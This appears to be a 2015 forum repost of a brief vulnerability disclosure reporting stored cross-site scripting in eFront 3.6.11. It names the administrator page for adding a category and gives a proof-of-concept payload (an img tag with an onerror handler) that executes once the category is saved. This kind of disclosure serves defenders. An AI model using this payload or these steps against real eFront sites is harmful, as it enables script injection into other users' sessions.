Aerosol Posted February 27, 2015 Report Posted February 27, 2015 # Affected software: efrontlearning# Type of vulnerability: stored xss# URL: http://demo.efrontlearning.net/# Discovered by: Provensec# Website: http://www.provensec.com# Description: Open Source e-Learning# Proof of concept#version:eFront 3.6.11goto addd new categoryhttp://demo.efrontlearning.net/enterprise/www/administrator.php?ctg=directionsand add new with xss payload "><img src=d onerror=confirm(1);> andsave it payload will execute#screen:http://prntscr.com/69zhgeSource Quote